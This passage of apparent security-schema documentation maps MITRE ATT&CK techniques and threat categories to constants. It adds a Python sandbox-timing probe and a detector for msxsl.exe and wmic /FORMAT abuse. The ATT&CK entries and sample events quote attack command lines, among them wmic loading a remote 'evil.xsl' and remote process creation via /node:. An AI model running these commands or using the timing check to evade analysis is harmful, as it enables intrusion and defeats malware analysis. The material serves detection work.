adversaries can also use a special I/O port to send commands and receive output. Hardware checks, such
as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can
be indicative of a virtual environment. Adversaries may also query for specific readings from these devices.
(Citation: Unit 42 OilRig Sept 2018) https://attack.mitre.org/techniques/T1497/001
T1497.003 XDM_CONST.MITRE_TECHNIQUE_SANDBOX_EVASION_TIME_BASED_EVASION Adversaries may employ various time-based methods to detect and avoid virtualization and analysis
environments. This may include enumerating time-based properties, such as uptime or the system clock, as
well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox,
specifically those that are automated or only operate for a limited amount of time. Adversaries may employ
various time-based evasions, such as delaying malware functionality upon initial execution using
programmatic sleep commands or native system scheduling functionality (ex: [Scheduled Task/Job](https://
attack.mitre.org/techniques/T1053)). Delays may also be based on waiting for specific victim conditions to
be met (ex: system time, events, etc.) or employ scheduled [Multi-Stage Channels](https://attack.mitre.org/
techniques/T1104) to avoid analysis and scrutiny.(Citation: Deloitte Environment Awareness) Benign
commands or other operations may also be used to delay malware execution. Loops or otherwise needless
repetitions of commands, such as [Ping](https://attack.mitre.org/software/S0097)s, may be used to delay
malware execution and potentially exceed time thresholds of automated analysis environments.(Citation:
Revil Independence Day)(Citation: Netskope Nitol) Another variation, commonly referred to as API
hammering, involves making various calls to [Native API](https://attack.mitre.org/techniques/T1106)
functions in order to delay execution (while also potentially overloading analysis environments with junk
data).(Citation: Joe Sec Nymaim)(Citation: Joe Sec Trickbot) Adversaries may also use time as a metric to
detect sandboxes and analysis environments, particularly those that attempt to manipulate time
mechanisms to simulate longer elapses of time. For example, an adversary may be able to identify a
sandbox accelerating time by sampling and calculating the expected value for an environment's timestamp
before and after execution of a sleep function.(Citation: ISACA Malware Tricks) https://attack.mitre.org/
techniques/T1497/003
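The timestamp-sampling check described above for T1497.003, as an added example that is not taken from this page, from ATT&CK or from any product. It reads like a sample-side check, but its practical use for a defender is validating a sandbox: run it inside the analysis environment and it reports whether the sleep primitive was stubbed out, or whether one clock was fast-forwarded while another was not. The FastForwardSandbox class is a constructed stand-in for such an environment; the tolerance and the 0.2 s baseline delay are arbitrary choices.

```python
import time


class FastForwardSandbox:
    """Constructed stand-in for a sandbox that skips the requested sleep but
    fast-forwards the wall clock so the sample believes the delay elapsed."""

    def __init__(self):
        self.wall = 1_700_000_000.0   # fake epoch seconds
        self.mono = 0.0               # fake monotonic seconds

    def sleep(self, seconds):
        self.wall += seconds          # pretend the time passed ...
        self.mono += 0.001            # ... while almost nothing really elapsed

    def wall_clock(self):
        return self.wall

    def mono_clock(self):
        return self.mono


def probe_sleep(sleep_fn, requested_s, wall_clock=time.time,
                mono_clock=time.monotonic, tolerance=0.25):
    """Time one sleep against two independent clocks and report inconsistencies.

    sleep_skipped: the monotonic clock advanced much less than requested.
    clock_skew:    the two clocks disagree about how much time passed.
    """
    wall0, mono0 = wall_clock(), mono_clock()
    sleep_fn(requested_s)
    wall1, mono1 = wall_clock(), mono_clock()
    wall_elapsed, mono_elapsed = wall1 - wall0, mono1 - mono0
    slack = max(requested_s * tolerance, 0.05)   # absorb scheduler jitter
    sleep_skipped = mono_elapsed < requested_s - slack
    clock_skew = abs(wall_elapsed - mono_elapsed) > slack
    return {
        "requested": requested_s,
        "wall_elapsed": wall_elapsed,
        "mono_elapsed": mono_elapsed,
        "sleep_skipped": sleep_skipped,
        "clock_skew": clock_skew,
        "suspicious": sleep_skipped or clock_skew,
    }


def probe_real_host(requested_s=0.2):
    """Baseline: the interpreter's own sleep and clocks, nothing patched."""
    return probe_sleep(time.sleep, requested_s)


def probe_stubbed_sleep(requested_s=0.2):
    """Sandbox that patches sleep to return immediately and leaves clocks alone."""
    return probe_sleep(lambda s: None, requested_s)


def probe_fast_forward(requested_s=5.0):
    """Sandbox that skips the sleep but advances the wall clock to hide it."""
    sandbox = FastForwardSandbox()
    return probe_sleep(sandbox.sleep, requested_s,
                       sandbox.wall_clock, sandbox.mono_clock)


if __name__ == "__main__":
    for name, result in (("real host", probe_real_host()),
                         ("stubbed sleep", probe_stubbed_sleep()),
                         ("fast-forward", probe_fast_forward())):
        print(f"{name:14s} skipped={result['sleep_skipped']} "
              f"skew={result['clock_skew']} suspicious={result['suspicious']}")
```

A sandbox that hooks every time source consistently (the sleep primitive, the wall clock, the tick counter, the high-resolution timer) passes both checks; the harness only exposes environments where one source is patched and the others are not, which is exactly the gap the technique description says malware looks for.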
T1497.002 XDM_CONST.MITRE_TECHNIQUE_SANDBOX_EVASION_USER_ACTIVITY_BASED_CHECKS Adversaries may employ various user activity checks to detect and avoid virtualization and analysis
environments. This may include changing behaviors based on the results of checks for the presence of
artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME,
they may alter their malware to disengage from the victim or conceal the core functions of the implant. They
may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use
the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)
during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
Adversaries may search for user activity on the host based on variables such as the speed/frequency of
mouse movements and clicks (Citation: Sans Virtual Jan 2016) , browser history, cache, bookmarks, or
number of files in common directories such as home or the desktop. Other methods may rely on specific
user interaction with the system before the malicious code is activated, such as waiting for a document to
close before activating a macro (Citation: Unit 42 Sofacy Nov 2018) or waiting for a user to double click on
an embedded image to activate.(Citation: FireEye FIN7 April 2017) https://attack.mitre.org/techniques/
T1497/002
T1600 XDM_CONST.MITRE_TECHNIQUE_WEAKEN_ENCRYPTION Adversaries may compromise a network device’s encryption capability in order to bypass encryption that
would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution) Encryption can be
used to protect transmitted network traffic to maintain its confidentiality (protect against unauthorized
disclosure) and integrity (protect against unauthorized changes). Encryption ciphers are used to convert a
plaintext message to ciphertext and can be computationally intensive to decipher without the associated
decryption key. Typically, longer keys increase the cost of cryptanalysis, or decryption without the key.
Adversaries can compromise and manipulate devices that perform encryption of network traffic. For
example, through behaviors such as [Modify System Image](https://attack.mitre.org/techniques/T1601),
[Reduce Key Space](https://attack.mitre.org/techniques/T1600/001), and [Disable Crypto Hardware](https://
attack.mitre.org/techniques/T1600/002), an adversary can negatively affect or eliminate a device’s
ability to securely encrypt network traffic. This poses a greater risk of unauthorized disclosure and may help
facilitate data manipulation, Credential Access, or Collection efforts. (Citation: Cisco Blog Legacy Device
Attacks) https://attack.mitre.org/techniques/T1600
T1600.002 XDM_CONST.MITRE_TECHNIQUE_WEAKEN_ENCRYPTION_DISABLE_CRYPTO_HARDWARE Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage
weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and
exfiltrating transmitted data. Many network devices such as routers, switches, and firewalls, perform
encryption on network traffic to secure transmission across networks. Often, these devices are equipped
with special, dedicated encryption hardware to greatly increase the speed of the encryption process as well
as to prevent malicious tampering. When an adversary takes control of such a device, they may disable the
dedicated hardware, for example, through use of [Modify System Image](https://attack.mitre.org/techniques/
T1601), forcing the use of software to perform encryption on general processors. This is typically used in
conjunction with attacks to weaken the strength of the cipher in software (e.g., [Reduce Key Space](https://
attack.mitre.org/techniques/T1600/001)). (Citation: Cisco Blog Legacy Device Attacks) https://
attack.mitre.org/techniques/T1600/002
T1600.001 XDM_CONST.MITRE_TECHNIQUE_WEAKEN_ENCRYPTION_REDUCE_KEY_SPACE Adversaries may reduce the level of effort required to decrypt data transmitted over the network by
reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)
Adversaries can weaken the encryption software on a compromised network device by reducing the key
size used by the software to convert plaintext to ciphertext (e.g., from hundreds or thousands of bytes to
just a couple of bytes). As a result, adversaries dramatically reduce the amount of effort needed to decrypt
the protected information without the key. Adversaries may modify the key size used and other encryption
parameters using specialized commands in a [Network Device CLI](https://attack.mitre.org/techniques/
T1059/008) introduced to the system through [Modify System Image](https://attack.mitre.org/techniques/
T1601) to change the configuration of the device. (Citation: Cisco Blog Legacy Device Attacks) https://
attack.mitre.org/techniques/T1600/001
T1102 XDM_CONST.MITRE_TECHNIQUE_WEB_SERVICE Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a
compromised system. Popular websites and social media acting as a mechanism for C2 may give a
significant amount of cover due to the likelihood that hosts within a network are already communicating with
them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it
easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption,
giving adversaries an added level of protection. Use of Web services may also protect back-end C2
infrastructure from discovery through malware binary analysis while also enabling operational resiliency
(since this infrastructure may be dynamically changed). https://attack.mitre.org/techniques/T1102
T1102.002 XDM_CONST.MITRE_TECHNIQUE_WEB_SERVICE_BIDIRECTIONAL_COMMUNICATION Adversaries may use an existing, legitimate external Web service as a means for sending commands to
and receiving output from a compromised system over the Web service channel. Compromised systems
may leverage popular websites and social media to host command and control (C2) instructions. Those
infected systems can then send the output from those commands back over that Web service channel. The
return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the
return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull
request to development project, updating a document hosted on a Web service, or by sending a Tweet.
Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover
due to the likelihood that hosts within a network are already communicating with them prior to a
compromise. Using common services, such as those offered by Google or Twitter, makes it easier for
adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving
adversaries an added level of protection. https://attack.mitre.org/techniques/T1102/002
T1102.001 XDM_CONST.MITRE_TECHNIQUE_WEB_SERVICE_DEAD_DROP_RESOLVER Adversaries may use an existing, legitimate external Web service to host information that points to
additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop
resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once
infected, victims will reach out to and be redirected by these resolvers. Popular websites and social media
acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within
a network are already communicating with them prior to a compromise. Using common services, such as
those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service
providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. Use of a
dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary
analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
https://attack.mitre.org/techniques/T1102/001
T1102.003 XDM_CONST.MITRE_TECHNIQUE_WEB_SERVICE_ONE_WAY_COMMUNICATION Adversaries may use an existing, legitimate external Web service as a means for sending commands to a
compromised system without receiving return output over the Web service channel. Compromised systems
may leverage popular websites and social media to host command and control (C2) instructions. Those
infected systems may opt to send the output from those commands back over a different C2 channel,
including to another distinct Web service. Alternatively, compromised systems may return no output at all in
cases where adversaries want to send instructions to systems and do not want a response. Popular
websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the
likelihood that hosts within a network are already communicating with them prior to a compromise. Using
common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in
expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added
level of protection. https://attack.mitre.org/techniques/T1102/003
T1047 XDM_CONST.MITRE_TECHNIQUE_WINDOWS_MANAGEMENT_INSTRUMENTATION Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and
payloads. WMI is an administration feature that provides a uniform environment to access Windows system
components. The WMI service enables both local and remote access, though the latter is facilitated by
[Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object
Model](https://attack.mitre.org/techniques/T1021/003) (DCOM) and [Windows Remote Management]
(https://attack.mitre.org/techniques/T1021/006) (WinRM). (Citation: MSDN WMI) Remote WMI over DCOM
operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986
for HTTPS. (Citation: MSDN WMI) (Citation: FireEye WMI 2015) An adversary can use WMI to interact with
local and remote systems and use it as a means to execute various behaviors, such as gathering
information for Discovery as well as remote Execution of files as part of Lateral Movement. (Citation:
FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) https://attack.mitre.org/techniques/T1047
T1220 XDM_CONST.MITRE_TECHNIQUE_XSL_SCRIPT_PROCESSING Adversaries may bypass application control and obscure execution of code by embedding scripts inside
XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and
rendering of data within XML files. To support complex operations, the XSL standard includes support for
embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017) Adversaries may
abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to
[Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127), the Microsoft
command line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and
used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files.
(Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default, an
adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR
2018) Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file
is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also
give the XML/XSL files an arbitrary file extension.(Citation: XSL Bypass Mar 2019) Command-line
examples:(Citation: Penetration Testing Lab MSXSL July 2017)(Citation: XSL Bypass Mar 2019) *
msxsl.exe customers[.]xml script[.]xsl * msxsl.exe script[.]xsl script[.]xsl * msxsl.exe
script[.]jpeg script[.]jpeg Another variation of this technique, dubbed “Squiblytwo”, involves using
[Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or
VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts
and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1218/010)/ "Squiblydoo" counterpart,
leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management
Instrumentation](https://attack.mitre.org/techniques/T1047) provided they utilize the /FORMAT switch.
(Citation: XSL Bypass Mar 2019) Command-line examples:(Citation: XSL Bypass Mar 2019)(Citation:
LOLBAS Wmic) * Local File: wmic process list /FORMAT:evil[.]xsl * Remote File: wmic os get /FORMAT:"https[:]//example[.]com/evil[.]xsl" https://attack.mitre.org/techniques/T1220
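The msxsl.exe and wmic /FORMAT command lines above, turned into detection logic over process-creation events, as an added example that is not part of the XSIAM schema or of ATT&CK. It serves both the T1220 entry and the Windows Management Instrumentation entry (T1047) above: every wmic.exe execution is tagged with the WMI constant (and its /node: target, the remote-execution case), and the XSL constant is added only when /FORMAT names a stylesheet outside the stock set. It assumes a minimal raw record (host, user, command_line), a handful of XDM field paths taken from the fieldsets listed on this page (xdm.source.process.command_line, xdm.alert.mitre_techniques, xdm.target.host.hostname, xdm.target.url; check the field definitions for your schema version), and an allowlist of the stock stylesheet keywords WMIC ships in System32\wbem. The sample events are constructed.

```python
import ntpath
import re

# Constant names as they appear in the XDM_CONST.MITRE_TECHNIQUE list above.
XSL_SCRIPT_PROCESSING = "XDM_CONST.MITRE_TECHNIQUE_XSL_SCRIPT_PROCESSING"
WINDOWS_MANAGEMENT_INSTRUMENTATION = (
    "XDM_CONST.MITRE_TECHNIQUE_WINDOWS_MANAGEMENT_INSTRUMENTATION")

# Stock stylesheets in %SystemRoot%\System32\wbem that /FORMAT resolves by
# keyword. Assumption: verify against the builds you run; any other value is
# a caller-supplied XSL file (the "Squiblytwo" case).
BUILTIN_WMIC_FORMATS = {
    "csv", "hform", "htable", "list", "mof", "rawxml", "table", "value", "xml",
    "textvaluelist.xsl", "texttable.xsl", "texttablewsys.xsl",
}

_FORMAT_RE = re.compile(r'/format:(?:"([^"]*)"|(\S+))', re.IGNORECASE)
_NODE_RE = re.compile(r'/node:(?:"([^"]*)"|(\S+))', re.IGNORECASE)


def _image_name(command_line):
    """Basename of the executable token, lower-cased, .exe appended if omitted."""
    if command_line.startswith('"'):
        end = command_line.find('"', 1)
        first = command_line[1:end] if end > 0 else command_line[1:]
    else:
        first = command_line.split(None, 1)[0] if command_line.strip() else ""
    name = ntpath.basename(first).lower()
    if name and "." not in name:
        name += ".exe"
    return name


def classify_command_line(command_line):
    """Map one process-creation command line to XDM technique constants."""
    image = _image_name(command_line)
    result = {"techniques": [], "remote_node": None, "stylesheet_url": None}
    if image == "msxsl.exe":
        # Not present on a default install and accepts any file extension, so
        # every execution is tagged regardless of its arguments.
        result["techniques"].append(XSL_SCRIPT_PROCESSING)
    elif image == "wmic.exe":
        result["techniques"].append(WINDOWS_MANAGEMENT_INSTRUMENTATION)
        fmt = _FORMAT_RE.search(command_line)
        if fmt:
            value = (fmt.group(1) or fmt.group(2)).strip()
            if value.lower() not in BUILTIN_WMIC_FORMATS:
                result["techniques"].append(XSL_SCRIPT_PROCESSING)
                if "://" in value:          # stylesheet fetched over the network
                    result["stylesheet_url"] = value
        node = _NODE_RE.search(command_line)
        if node:                            # remote WMI execution target
            result["remote_node"] = (node.group(1) or node.group(2)).strip()
    return result


def normalize(raw):
    """Constructed minimal raw record -> XDM-shaped dict (field paths assumed)."""
    c = classify_command_line(raw["command_line"])
    return {
        "xdm.source.host.hostname": raw["host"],
        "xdm.source.user.username": raw["user"],
        "xdm.source.process.executable.filename": _image_name(raw["command_line"]),
        "xdm.source.process.command_line": raw["command_line"],
        "xdm.target.host.hostname": c["remote_node"],
        "xdm.target.url": c["stylesheet_url"],
        "xdm.alert.mitre_techniques": c["techniques"],
    }


SAMPLE_EVENTS = [  # constructed, not real telemetry
    {"host": "ws-01", "user": "alice", "command_line": "msxsl.exe customers.xml script.xsl"},
    {"host": "ws-01", "user": "alice", "command_line":
        '"C:\\Users\\alice\\AppData\\Local\\Temp\\msxsl.exe" script.jpeg script.jpeg'},
    {"host": "ws-02", "user": "bob", "command_line": "wmic process list /FORMAT:evil.xsl"},
    {"host": "ws-02", "user": "bob", "command_line":
        'C:\\Windows\\System32\\wbem\\WMIC.exe os get /FORMAT:"https://example.com/evil.xsl"'},
    {"host": "srv-adm", "user": "svc_inv", "command_line": "wmic process list brief /format:csv"},
    {"host": "srv-adm", "user": "svc_inv", "command_line":
        'wmic /node:srv01 process call create "cmd.exe /c whoami"'},
    {"host": "ws-03", "user": "carol", "command_line": "notepad.exe C:\\notes.txt"},
]


def run_samples():
    return [normalize(event) for event in SAMPLE_EVENTS]


if __name__ == "__main__":
    for ev in run_samples():
        if ev["xdm.alert.mitre_techniques"]:
            print(ev["xdm.source.host.hostname"], ev["xdm.alert.mitre_techniques"],
                  ev["xdm.source.process.command_line"])
```

Two caveats a practitioner would want: a URL-referenced stylesheet also produces an outbound HTTP request from wmic.exe, so the same event should correlate with network telemetry; and on Windows builds where wmic.exe has been removed the WMIC branch never fires, while msxsl.exe, which is never installed by default, remains a high-signal match on its own.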
3.30 | XDM_CONST.THREAT_CATEGORY
The threat's category, see https://docs.paloaltonetworks.com/pan-os/10-2/pan-os-admin/threat-prevention/threat-signatures.html
dmg XDM_CONST.THREAT_CATEGORY_DMG Malicious Apple disk image (DMG) files used with Mac OS X.
flash XDM_CONST.THREAT_CATEGORY_FLASH Adobe Flash applets and Flash content embedded in web pages.
macho XDM_CONST.THREAT_CATEGORY_MACHO Mach object files (Mach-O) are executables, libraries, and object code that are native to Mac OS X.
office XDM_CONST.THREAT_CATEGORY_OFFICE Microsoft Office files, including documents (DOC, DOCX, RTF), workbooks (XLS, XLSX), and PowerPoint presentations (PPT, PPTX).
pe XDM_CONST.THREAT_CATEGORY_PE Portable executable (PE) files can automatically execute on a Microsoft Windows system and should only be allowed when authorized. These file types include: object code, fonts (FONs), system files (SYS), driver files (DRV),
Windows Control Panel items (CPLs), DLLs (dynamic-link libraries), OCXs (libraries for OLE custom controls, or ActiveX controls), SCRs (screen saver executables, which run like any other PE), Extensible Firmware Interface (EFI) files,
which run between an OS and firmware to facilitate device updates and boot operations, and program information files (PIFs).
pkg XDM_CONST.THREAT_CATEGORY_PKG Apple software installer packages (PKGs), used with Mac OS X.
adware XDM_CONST.THREAT_CATEGORY_ADWARE Detects programs that display potentially unwanted advertisements. Some adware modifies browsers to highlight and hyperlink the most frequently searched keywords on web pages; these links redirect users to advertising websites.
Adware can also retrieve updates from a command-and-control (C2) server and install those updates in a browser or onto a client system. Newly released protections in this category are rare.
autogen XDM_CONST.THREAT_CATEGORY_AUTOGEN These payload-based signatures detect command-and-control (C2) traffic and are automatically-generated. Importantly, autogen signatures can detect C2 traffic even when the C2 host is unknown or changes rapidly.
backdoor XDM_CONST.THREAT_CATEGORY_BACKDOOR Detects a program that allows an attacker to gain unauthorized remote access to a system.
botnet XDM_CONST.THREAT_CATEGORY_BOTNET Indicates botnet activity. A botnet is a network of malware-infected computers ("bots") that an attacker controls. The attacker can centrally command every computer in a botnet to simultaneously carry out a coordinated action (such as launching a DoS attack).
browser-hijack XDM_CONST.THREAT_CATEGORY_BROWSER_HIJACK Detects a plugin or software that is modifying browser settings. A browser hijacker might take over auto search or track users' web activity and send this information to a C2 server. Newly-released protections in this category are rare.
cryptominer XDM_CONST.THREAT_CATEGORY_CRYPTOMINER (Sometimes known as cryptojacking or miners) Detects the download attempt or network traffic generated from malicious programs designed to use computing resources to mine cryptocurrencies without the user's knowledge. Cryptominer binaries are frequently delivered by a shell script downloader that attempts to determine system architecture and kill other miner processes on the system. Some miners execute within other processes, such as a web browser rendering a malicious web page.
data-theft XDM_CONST.THREAT_CATEGORY_DATA_THEFT Detects a system sending information to a known C2 server. Newly-released protections in this category are rare.
dns XDM_CONST.THREAT_CATEGORY_DNS Detects DNS requests to connect to malicious domains. dns and dns-wildfire signatures detect the same malicious domains; however, dns signatures are included in the daily Antivirus content update and dns-wildfire signatures are included in the WildFire updates that release protections every 5 minutes.
dns-security XDM_CONST.THREAT_CATEGORY_DNS_SECURITY Detects DNS requests to connect to malicious domains. dns-security includes signatures from dns and dns-wildfire in addition to the unique signatures generated by the DNS Security service.
dns-wildfire XDM_CONST.THREAT_CATEGORY_DNS_WILDFIRE Detects DNS requests to connect to malicious domains. dns and dns-wildfire signatures detect the same malicious domains; however, dns signatures are included in the daily Antivirus content update and dns-wildfire signatures are included in the WildFire updates that release protections every 5 minutes.
downloader XDM_CONST.THREAT_CATEGORY_DOWNLOADER (Also known as droppers, stagers, or loaders) Detects programs that use an internet connection to connect to a remote server to download and execute malware on the compromised system. The most common use case is for a downloader to be deployed as the culmination of stage one of a cyber attack, where the downloader's fetched payload execution is considered second stage. Shell scripts (Bash, PowerShell, etc.), trojans, and malicious lure documents (also known as maldocs) such as PDFs and Word files are common downloader types.
fraud XDM_CONST.THREAT_CATEGORY_FRAUD (Including form-jacking, phishing, and scams) Detects access to compromised websites that have been determined to be injected with malicious JavaScript code to collect sensitive user information (for example, name, address, email, credit card number, CVV, and expiration date) from payment forms that are captured on the checkout pages of e-commerce websites.
hacktool XDM_CONST.THREAT_CATEGORY_HACKTOOL Detects traffic generated by software tools that are used by malicious actors to conduct reconnaissance, attack or gain access to vulnerable systems, exfiltrate data, or create a command and control channel to surreptitiously control a computer system without authorization. These programs are strongly associated with malware and cyber attacks. Hacking tools might be deployed in a benign manner when used in Red and Blue Team operations, penetration tests, and R&D. The use or possession of these tools may be illegal in some countries, regardless of intent.
keylogger XDM_CONST.THREAT_CATEGORY_KEYLOGGER Detects programs that allow attackers to secretly track user activity by logging keystrokes and capturing screenshots. Keyloggers use various C2 methods to periodically send logs and reports to a predefined e-mail address or a C2 server. Through keylogger surveillance, an attacker could retrieve credentials that would enable network access.
networm XDM_CONST.THREAT_CATEGORY_NETWORM Detects a program that self-replicates and spreads from system to system. Net-worms might use shared resources or leverage security failures to access target systems.
phishing-kit XDM_CONST.THREAT_CATEGORY_PHISHING_KIT Detects when a user attempts to connect to a phishing kit landing page (likely after receiving an email with a link to the malicious site). A phishing website tricks users into submitting credentials that an attacker can steal to gain access to the network. In addition to blocking access to phishing kit landing pages, enable Multi-Factor Authentication and Prevent Credential Phishing to prevent phishing attacks at all stages.
post-exploitation XDM_CONST.THREAT_CATEGORY_POST_EXPLOITATION Detects activity that indicates the post-exploitation phase of an attack, where an attacker attempts to assess the value of a compromised system. This might include evaluating the sensitivity of the data stored on the system, and the system's usefulness in further compromising the network.
webshell XDM_CONST.THREAT_CATEGORY_WEBSHELL Detects web shells and web shell traffic, including implant detection and command and control interaction. Web shells must first be implanted by a malicious actor onto the compromised host, most often targeting a web server or framework. Subsequent communication with the web shell file frequently enables a malicious actor to establish a foothold in the system, conduct service and network enumeration, data exfiltration, and remote code execution in the context of the web server user. The most common web shell types are PHP, .NET, and Perl markup scripts. Attackers can also use web shell-infected web servers (the web servers can be both internet-facing or internal systems) to target other internal systems.
spyware XDM_CONST.THREAT_CATEGORY_SPYWARE Detects outbound C2 communication. These signatures are either auto-generated or are manually created by Palo Alto Networks researchers. Spyware and autogen signatures both detect outbound C2 communication; however, autogen signatures are payload-based and can uniquely detect C2 communications with C2 hosts that are unknown or change rapidly.
brute force XDM_CONST.THREAT_CATEGORY_BRUTE_FORCE A brute-force signature detects multiple occurrences of a condition in a particular time frame. While the activity in isolation might be benign, the brute-force signature indicates that the frequency and rate at which the activity occurred is suspect. For example, a single FTP login failure does not indicate malicious activity. However, many failed FTP logins in a short period likely indicate an attacker attempting password combinations to access an FTP server. You can tune the action and trigger conditions for brute force signatures.
code execution XDM_CONST.THREAT_CATEGORY_CODE_EXECUTION Detects a code execution vulnerability that an attacker can leverage to run code on a system with the privileges of the logged-in user.
code-obfuscation XDM_CONST.THREAT_CATEGORY_CODE_OBFUSCATION Detects code that has been transformed to conceal certain data while retaining its function. Obfuscated code is difficult or impossible to read, so it's not apparent what commands the code is executing or with which programs it's designed to interact. Most commonly, malicious actors obfuscate code to conceal malware. More rarely, legitimate developers might obfuscate code to protect privacy, intellectual property, or to improve user experience. For example, certain types of obfuscation (like minification) reduce file size, which decreases website load times and bandwidth usage.
dos XDM_CONST.THREAT_CATEGORY_DOS Detects a denial-of-service (DoS) attack, where an attacker attempts to render a targeted system unavailable, temporarily disrupting the system and dependent applications and services. To perform a DoS attack, an attacker might flood a targeted system with traffic or send information that causes it to fail. DoS attacks deprive legitimate users (like employees, members, and account holders) of the service or resource to which they expect access.
exploit-kit XDM_CONST.THREAT_CATEGORY_EXPLOIT_KIT Detects an exploit kit landing page. Exploit kit landing pages often contain several exploits that target one or many common vulnerabilities and exposures (CVEs), for multiple browsers and plugins. Because the targeted CVEs change quickly, exploit-kit signatures trigger based on the exploit kit landing page, and not the CVEs. When a user visits a website with an exploit kit, the exploit kit scans for the targeted CVEs and attempts to silently deliver a malicious payload to the victim's computer.
info-leak XDM_CONST.THREAT_CATEGORY_INFO_LEAK Detects a software vulnerability that an attacker could exploit to steal sensitive or proprietary information. Often, an info-leak might exist because comprehensive checks do not exist to guard the data, and attackers can exploit info-leaks by sending crafted requests.
insecure-credentials XDM_CONST.THREAT_CATEGORY_INSECURE_CREDENTIALS Detects the use of weak, compromised, and manufacturer default passwords for software, network appliances, and IoT devices.
overflow XDM_CONST.THREAT_CATEGORY_OVERFLOW Detects an overflow vulnerability, where a lack of proper checks on requests could be exploited by an attacker. A successful attack could lead to remote code execution with the privileges of the application, server or operating system.
phishing XDM_CONST.THREAT_CATEGORY_PHISHING Detects when a user attempts to connect to a phishing kit landing page (likely after receiving an email with a link to the malicious site). A phishing website tricks users into submitting credentials that an attacker can steal to gain access to the network. In addition to blocking access to phishing kit landing pages, enable Multi-Factor Authentication and Prevent Credential Phishing to prevent phishing attacks at all stages.
Original Mapped Description
protocol-anomaly XDM_CONST.THREAT_CATEGORY_PROTOCOL_ANOMALY Detects protocol anomalies, where a protocol behavior deviates from standard and compliant usage. For example, a malformed packet, poorly-written application, or an application running on a non-standard port would all be considered protocol anomalies, and could be used as evasion tools. It is a best practice to block protocol anomalies of any severity.
sql-injection XDM_CONST.THREAT_CATEGORY_SQL_INJECTION Detects a common hacking technique where an attacker inserts SQL queries into an application's requests, in order to read from or modify a database. This type of technique is often used on websites that do not comprehensively sanitize user input.
3.31 | XDM_CONST.URL_CATEGORY
URL category. See https://knowledgebase.paloaltonetworks.com/KCSArticleDetail?id=kA10g000000Cm5hCAC.
1 XDM_CONST.URL_CATEGORY_ABORTION Sites that pertain to information or groups in favor of or against abortion, details regarding abortion procedures, help or support forums for or against abortion, or sites that provide information regarding the consequences/effects of pursuing (or not) an abortion.
2 XDM_CONST.URL_CATEGORY_ABUSED_DRUGS Sites that promote the abuse of both legal and illegal drugs, use and sale of drug related paraphernalia, manufacturing and/or selling of drugs.
3 XDM_CONST.URL_CATEGORY_ADULT Sexually explicit material, media (including language), art, and/or products, online groups or forums that are sexually explicit in nature. Sites that promote adult services such as video/telephone conferencing, escort services, strip clubs, etc. Anything containing adult content (even if it's games or comics) will be categorized as adult.
4 XDM_CONST.URL_CATEGORY_ALCOHOL_AND_TOBACCO Sites that pertain to the sale, manufacturing, or use of alcohol and/or tobacco products and related paraphernalia. Includes sites related to electronic cigarettes.
6 XDM_CONST.URL_CATEGORY_BUSINESS_AND_ECONOMY Marketing, management, economics, and sites relating to entrepreneurship or running a business. Includes advertising and marketing firms. Should not include corporate websites as they should be categorized with their technology. Also shipping sites, such as fedex.com and ups.com.
7 XDM_CONST.URL_CATEGORY_COMMAND_AND_CONTROL Command-and-control URLs and domains used by malware and/or compromised systems to surreptitiously communicate with an attacker's remote server to receive malicious commands or exfiltrate data
8 XDM_CONST.URL_CATEGORY_COMPUTER_AND_INTERNET_INFO General information regarding computers and the internet. Should include sites about computer science, engineering, hardware, software, security, programming, etc. Programming may have some overlap with reference, but the main category should remain computer and internet info.
9 XDM_CONST.URL_CATEGORY_CONTENT_DELIVERY_NETWORKS Sites whose primary focus is delivering content to 3rd parties such as advertisements, media, files, etc. Also includes image servers.
10 XDM_CONST.URL_CATEGORY_COPYRIGHT_INFRINGEMENT Domains with illegal content, such as content that allows illegal download of software or other intellectual property, which poses a potential liability risk. This category was introduced to enable adherence to child protection laws required in the education industry as well as laws in countries that require internet providers to prevent users from sharing copyrighted material through their service.
